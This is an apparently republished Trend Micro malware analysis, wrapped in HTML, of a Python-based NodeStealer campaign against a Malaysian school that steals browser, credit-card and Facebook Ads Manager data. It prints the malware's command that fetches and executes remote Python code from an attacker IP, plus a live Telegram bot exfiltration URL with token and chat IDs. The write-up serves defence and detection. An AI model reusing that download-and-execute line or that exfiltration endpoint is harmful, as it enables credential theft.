Python-Based NodeStealer Version Targets Facebook Ads Manager | Trend Micro (US)<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\">\n<link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendmicro\/clientlibs\/trendmicro-core-2\/clientlibs\/header-footer.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/l\/python-based-nodestealer.html\"><br \/>\n<meta property=\"og:title\" content=\"Python-Based NodeStealer Version Targets Facebook Ads Manager\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/NodeStealer-thumbnail.png\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Python-Based NodeStealer Version Targets Facebook Ads Manager\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/NodeStealer-thumbnail.png\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"51.0293231425\">  <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a>  <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"123975887\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"11.278846153846\">\n<div class=\"article-details\" role=\"heading\" readability=\"42.173076923077\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Malware<\/p>\n<p class=\"article-details__description\">In this blog entry, Trend Micro\u2019s Managed XDR team discuss their investigation into how the latest variant of NodeStealer is delivered through spear-phishing attacks, potentially leading to malware execution, data theft, and the exfiltration of sensitive information via Telegram.<\/p>\n<p class=\"article-details__author-by\">By: Aira Marcelo, Bren Matthew Ebriega, Abdul Rahim <time class=\"article-details__date\">December 19, 2024<\/time> <span>Read time: <\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<div class=\"article-details__icons\">  <\/p>\n<div class=\"a2a_kit a2a_default_style\" data-a2a-icon-color=\"#717172\"> <a class=\"a2a_dd addthis_link\" href=\"https:\/\/www.addtoany.com\/share\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/share-more.svg\" class=\"svg-icon\" alt=\"Share\"> <\/a> <a class=\"a2a_button_print addthis_link\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/printer.svg\" class=\"svg-icon\" alt=\"Print\"> <\/a> <\/div>\n<p>   <\/div>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div class=\"richText\" readability=\"46.587719298246\">\n<div readability=\"38.657894736842\">\n<h4>Summary<\/h4>\n<ul>\n<li><span class=\"rte-red-bullet\">The NodeStealer malware has advanced from a JavaScript-based to a Python-based threat, enabling it to steal a broader range of sensitive data.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Trend Micro\u2019s MXDR team identified this updated NodeStealer variant in a malware campaign targeting an educational institution in Malaysia, linked to a Vietnamese threat group.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">This latest version of NodeStealer can not only harvests credit card details and browser-stored data, but also targets Facebook Ads Manager accounts for their critical financial and business information.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The infection chain starts with a spear-phishing email with a malicious embedded link, which upon clicking, downloads and installs the malware under the guise of a legitimate application.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The malware uses sophisticated techniques, such as DLL sideloading and encoded PowerShell commands, to bypass security defenses and execute the final payload, exfiltrating data through Telegram.<\/span><\/li>\n<\/ul>\n<p>The updated version of NodeStealer, initially identified in 2023 as <a href=\"https:\/\/engineering.fb.com\/2023\/05\/03\/security\/malware-nodestealer-ducktail\/\" target=\"_blank\" rel=\"noopener\">a JavaScript-based malware<\/a>, has significantly evolved into a more sophisticated Python-based threat that\u2019s able to extract a broader range of sensitive data from victims: This advanced variant of NodeStealer not only harvests credit card details and browser-stored information, but also targets Facebook Ads Manager accounts, siphoning critical financial and business data. Facebook Ads Manager, widely used by businesses and individuals to create, manage, and analyze advertising campaigns across various platforms including Facebook, Instagram, Messenger, and the Audience Network, has become a prime target for cybercriminals seeking to exploit sensitive personal and business-related information.<\/p>\n<p>A recent investigation by Trend Micro\u2019s Managed Extended Detection and Response (MXDR) team uncovered the presence of this updated NodeStealer variant in a malware campaign, underscoring its evolving techniques and the increased sophistication of modern cyber threats. Our analysis identified that the Malaysian victim was from the education sector. The campaign appears to have originated from a Vietnamese threat group, as suggested by the password that was used to compress the malicious files. The spear-phishing email carrying the malware was written in Bahasa Melayu to target Malay speaking victims. However, the awkward wording of the email message\u2019s subject line, which appeared to be machine-translated from English, raised the MXDR team’s suspicions during their investigation.<\/p>\n<h4>Technical details <\/h4>\n<p>The infection began with a spear-phishing email sent from a suspicious Gmail address, targeting multiple users within the organization (Figure 1). The email contained an embedded link that lured recipients into believing it was a link to a PDF file. Once clicked, it downloads the malicious file: a seemingly harmless PDF that\u2019s designed to exploit vulnerabilities in the users’ devices, allowing attackers to install malware and steal sensitive information. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig1.png\" alt=\"Figure 1. Infection chain\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 1. Infection chain<\/figcaption><\/div>\n<\/figure><\/div>\n<div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The attacker deceives the user by sending a fake copyright infringement notice (Figure 2). This tactic pressures the recipient into taking immediate action without carefully considering the message, often leading them to click on malicious links or download harmful files. The fraudulent notice is crafted to appear as though it’s from a legitimate authority.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig02.png\" alt=\"Figure 2. Email sample with the malicious embedded link (Translation: \u201cNotice of infringement of intellectual property rights\u201d)\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 2. Email sample with the malicious embedded link (Translation: \u201cNotice of infringement of intellectual property rights\u201d)<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37\">\n<div readability=\"19\">\n<p>Once the user clicks on the embedded malicious link in the email, it triggers the download of a suspicious file named <i>Nombor Rekod 052881.zip<\/i>. Upon extracting the contents of the zip file, the user inadvertently unleashes several suspicious files onto the system. These dropped files are as follow:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">D:\\<USER>\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\GHelper.dll<\/span><\/li>\n<li><span class=\"rte-red-bullet\">D:\\ <USER>\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\Nombor Rekod 052881.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">D:\\ <USER>\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\hpreaderfprefs.dat<\/span><\/li>\n<li><span class=\"rte-red-bullet\">D:\\ <USER>\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\oledlg.dll<\/span><\/li>\n<li><span class=\"rte-red-bullet\">D:\\ <USER>\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\images\\active-license.bat<\/span><\/li>\n<li><span class=\"rte-red-bullet\">D:\\ <USER>\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\images\\license-key.exe<\/span><\/li>\n<li><span class=\"rte-red-bullet\">D:\\ <USER>\\Downloads\\Nombor Rekod 052881\\Nombor Rekod 052881\\images\\license.rar<\/span><\/li>\n<\/ul>\n<p>The executable file <i>Nombor Rekod 052881.exe<\/i>, which appears to be a PDF reader \u2013 normally recognized as a trusted application \u2013 was observed being exploited to sideload the malicious DLL file <i>oledlg.dll<\/i> (Figure 3). As a result, the malware is able to execute its malicious actions under the guise of a legitimate program, enabling it to bypass security defenses and perform its attack unnoticed.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig03.png\" alt=\"Figure 3. Evidence of DLL side-loading from telemetry data\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 3. Evidence of DLL side-loading from telemetry data<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>As shown in Figure 4, the sideloaded DLL then executes a batch file, <i>images\\active-license.bat<\/i>, using the command prompt (cmd.exe).<\/p>\n<p><span class=\"blockquote\">C:\\Windows\\system32\\cmd.exe \/c start \/min images\\active-license.bat -> C:\\Windows\\system32\\cmd.exe \/K images\\active-license.bat<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig04.png\" alt=\"Figure 4. Process chain of DLL sideloading\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 4. Process chain of DLL sideloading<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>This batch file <i>images\\active-license.bat<\/i> contains a malicious encoded command which then executes the PowerShell shown in Figure 5:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig05.png\" alt=\"Figure 5. Malicious encoded PowerShell execution\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 5. Malicious encoded PowerShell execution<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"41\">\n<div readability=\"27\">\n<p>The PowerShell command performs the following actions:<\/p>\n<p><b>1. Hides the console window<\/b><\/p>\n<p><b>2. Force creates the folder %LocalAppData%\\ChromeApplication<\/b><\/p>\n<p><b>3. Unarchives the license.rar file (using license.exe) to %LocalAppData%\\ChromeApplication<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">images\\license-key.exe (SHA256: 0b1866b627d8078d296e7d39583c9f856117be79c1d226b8c9378fe075369118)<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">Original Filename: Rar.exe (WinRAR 7.1.0)<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Command line RAR<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Used to unarchive license.rar<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\">images\\license.rar (SHA256: ed1c48542a3e58020bd624c592f6aa7f7868ee16fbb03308269d44c4108011b1)<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">The archive is password protected (pw:Kimsexy@hacking.vn).<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Password can be obtained from the deobfuscated PowerShell command.<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">Contains a portable Python 3.10 interpreter that will download and execute the final payload.<\/span>\n<ul>\n<li><span class=\"rte-square-bullet\">synaptics.exe – Original Filename: pythonw.exe (python cli interpreter)<\/span><\/li>\n<li><span class=\"rte-square-bullet\">vcruntime140.dll<\/span><\/li>\n<li><span class=\"rte-square-bullet\">python3.10.dll<\/span><\/li>\n<li><span class=\"rte-square-bullet\">Other folders<\/span>\n<ul>\n<li><span class=\"rte-red-chevron\">C:\\Users\\<USERNAME>\\AppData\\Local\\ChromeApplication\\DLLs\\**<\/span><\/li>\n<li><span class=\"rte-red-chevron\">C:\\Users\\<USERNAME>\\AppData\\Local\\ChromeApplication\\DLLs\\**<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><b>4. Downloads and executes this decoy PDF file located at %User Profile%\\document.pdf:<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">“C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe” “C:\\Users\\ainanadiaz\\document.pdf”<\/span><\/li>\n<\/ul>\n<p><b>5. Ensures persistence through the startup-folder by:<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Creating the file WindowsSecurity.lnk<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Storing the file in %Application Data%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\<\/span><\/li>\n<\/ul>\n<p><b>6. Downloads (in-memory) and executes the final payload via command:<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">cmd \/C start “” “%LOCALAPPDATA%\\ChromeApplication\\synaptics.exe” -c “import requests;exec(requests.get(‘ http[:\/\/]88.216.99.5:15707\/entry.txt’), verify=False).text)<\/span><\/li>\n<\/ul>\n<p>The malware attempts to connect to the URL http[:\/\/]88.216.99.5:15707\/entry.txt to download and execute (in-memory) its final payload.<\/p>\n<p>The file <i>entry.txt<\/i> contains an obfuscated Python script, shown below in Figure 6. The script uses the combination of native Python commands <i>exec()<\/i> and <i>marshal.loads()<\/i> to execute Python bytecode directly.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig06.png\" alt=\"Figure 6. Python script to execute Python bytecode directly\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 6. Python script to execute Python bytecode directly<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>The disassembly of the bytecode shown in Figure 7 is used to decrypt another binary string using the function <i>hybrid_decrypt<\/i>. The output of said function is stored in the variable <i>code<\/i>. The variable is then passed to the function <i>runner<\/i> to execute the decrypted bytecode.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig07.png\" alt=\"Figure 7. Disassembled Python bytecode\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 7. Disassembled Python bytecode<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>Disassembling the bytecode from the variable <i>code<\/i> shows that the intended final payload is an infostealer designed to harvest credit card data and sensitive information stored in web browsers (Figure 8).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig08.png\" alt=\"Figure 8. An infostealer as the final payload\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 8. An infostealer as the final payload<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>In addition to harvesting data, this new campaign also targets Facebook Ads Manager accounts, extracting financial and business-related information to drive malicious advertising campaigns (Figure 9).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/l\/python-based-nodestealer\/NodeStealer-Fig09.png\" alt=\"Figure 9. Targeting Facebook Ads Manager accounts\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 9. Targeting Facebook Ads Manager accounts<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>It was observed that data exfiltration is carried out through Telegram, where the stolen sensitive information is first compiled into a zip archive. This archived data is then sent to a specific Telegram link. The use of Telegram as a medium for transferring the stolen data ensures a covert and efficient method for cybercriminals to exfiltrate sensitive information.<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">https[:\/\/]api[.]telegram[.]org\/bot7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI\/sendDocument<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The chat-id parameter used can be \u2018-1002426006531\u2019 or \u2018-1002489276039\u2019.<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"39.5\">\n<div readability=\"24\">\n<h4>Conclusion and recommendations<\/h4>\n<p>The newest NodeStealer variant demonstrates a more sophisticated approach to data theft: It specifically targets Facebook Ads Manager accounts, credit card information, and confidential data stored in web browsers, using increasingly sophisticated methods to bypass detection. This updated version emphasizes the need for heightened awareness and robust cybersecurity measures to defend against threats like NodeStealer.<\/p>\n<p>To safeguard against such threats, the following steps are highly recommended:<\/p>\n<ol>\n<li>Exercise caution with suspicious emails. <span>Always be skeptical of emails from unknown or untrusted sources. Be particularly wary of emails that contain embedded links, as these may lead to phishing sites designed to steal personal information or prompt the automatic download of malicious software, including infostealers like NodeStealer. Users should never click on links or download attachments from unfamiliar senders.<\/span><\/li>\n<li><b>Educate users to recognize threats.<\/b> <span>A key component of any strong cybersecurity defense is training. It is essential to educate users on how to identify the telltale signs of phishing attacks, suspicious emails, and potentially harmful links. Awareness of common social engineering tactics, such as fraudulent email requests or deceptive website URLs, can help users make informed decisions and avoid falling victim to cyber threats.<\/span><\/li>\n<li><b>Regularly scan for malware and keep antivirus software updated.<\/b> <span>Regularly scanning systems for malware and ensuring that antivirus software is up to date with the latest virus definitions is critical in defending against threats like NodeStealer. Cybercriminals are constantly evolving their tactics, so it\u2019s vital that security tools are always equipped to recognize and block the most recent threats. Make sure your system is regularly checked for infections and that antivirus software automatically installs updates to keep pace with new malware variants.<\/span><\/li>\n<\/ol>\n<p>By adopting these practices, individuals and organizations can significantly strengthen their defenses against sophisticated malware such as NodeStealer. Proactive steps\u2014such as cautious email habits, user education, and regular system maintenance\u2014are essential in building a comprehensive cybersecurity strategy that helps mitigate the risk of data breaches and other malicious activities.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"40.397473997028\">\n<div readability=\"29.717682020802\">\n<h4>Trend Micro Vision One Threat Intelligence<\/h4>\n<p>To stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.<\/p>\n<p><b>Trend Micro Vision One Intelligence Reports App [IOC Sweeping]<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">NodeStealer 2.0 \u2013 The Python Version: Stealing Facebook Business Accounts<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Python-Based NodeStealer Version Targets Facebook Ads Manager<\/span><\/li>\n<\/ul>\n<p><b>Trend Micro Vision One Threat Insights App<\/b><\/p>\n<h4>Hunting Queries<\/h4>\n<p><b>Trend Micro Vision One Search App<\/b><\/p>\n<p>Trend Micro Vision Once Customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.\u202f\u202f\u202f<\/p>\n<p><i>Detection of Malware Components of the Attack<\/i><\/p>\n<p><span class=\"blockquote\">malName:(*RASPBERRYROBIN* OR *NODESTEALER*) AND eventName:MALWARE_DETECTION<\/span><\/p>\n<p>More hunting queries are available for Vision One customers with\u202f<a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/one-platform\/threat-insights.html\" target=\"_blank\" rel=\"noopener\">Threat Insights Entitlement enabled<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<h4>Indicators of Compromise (IOCs) <\/h4>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"11\">\n<tr>\n<td width=\"154\" valign=\"top\"><b>Indicator<\/b><\/td>\n<td width=\"236\" valign=\"top\"><b>SHA256<\/b><\/td>\n<td width=\"117\" valign=\"top\"><b>Description<\/b><\/td>\n<td width=\"117\" valign=\"top\"><b>Detection<\/b><\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"154\" valign=\"top\">oledlg.dll <\/td>\n<td width=\"236\" valign=\"top\">f813da93eed9c536154a6da5f38462bfb4ed80c85dd117c3fd681cf4790fbf71<\/td>\n<td width=\"117\" valign=\"top\">Sideloaded DLL<\/td>\n<td width=\"117\" valign=\"top\">Trojan.Win32.RASPBERRYROBIN.HA<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td width=\"154\" valign=\"top\">active-license.bat <\/td>\n<td width=\"236\" valign=\"top\">1c9c7bb07acb9d612af2007cb633a6b1f569b197b1f93abc9bd3af8593e1ec66<\/td>\n<td width=\"117\" valign=\"top\">Executes the PowerShell command<\/td>\n<td width=\"117\" valign=\"top\">HackTool.BAT.HideConsole.A<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"154\" valign=\"top\">WindowsSecurity.lnk<\/td>\n<td width=\"236\" valign=\"top\">786db3ddf2a471516c832e44b0d9a230674630c6f99d3e61ada6830726172458<\/td>\n<td width=\"117\" valign=\"top\">Created persistence<\/td>\n<td width=\"117\" valign=\"top\">Trojan.LNK.DOWNLOADER.D<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td width=\"154\" valign=\"top\">hxxps:\/\/t[.]ly\/MRAbJ<br \/> <\/td>\n<td width=\"236\" valign=\"top\"> <\/td>\n<td width=\"117\" valign=\"top\">Malicious download link <\/td>\n<td width=\"117\" valign=\"top\">Dangerous \u2013 Disease Vector<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"154\" valign=\"top\">hxxp:\/\/88[.]216[.]99[.]5:15707\/entry[.]txt<\/td>\n<td width=\"236\" valign=\"top\"> <\/td>\n<td width=\"117\" valign=\"top\"> <\/td>\n<td width=\"117\" valign=\"top\">Dangerous \u2013 Malware Accomplice<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/center> <\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p>   <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p>  <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/l\/python-based-nodestealer.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this blog entry, Trend Micro\u2019s Managed XDR team discuss their investigation into how the latest variant of NodeStealer is delivered through spear-phishing attacks, potentially leading to malware execution, data theft, and the exfiltration of sensitive information via Telegram. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9511,9513,9509],"class_list":["post-57888","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-malware","tag-trend-micro-research-research"],"yoast_head":"\n<title>Python-Based NodeStealer Version Targets Facebook Ads Manager 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Python-Based NodeStealer Version Targets Facebook Ads Manager 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-12-19T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/NodeStealer-thumbnail:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Python-Based NodeStealer Version Targets Facebook Ads Manager\",\"datePublished\":\"2024-12-19T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/\"},\"wordCount\":1943,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/NodeStealer-thumbnail:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/\",\"name\":\"Python-Based NodeStealer Version Targets Facebook Ads Manager 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/NodeStealer-thumbnail:Large?qlt=80\",\"datePublished\":\"2024-12-19T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity 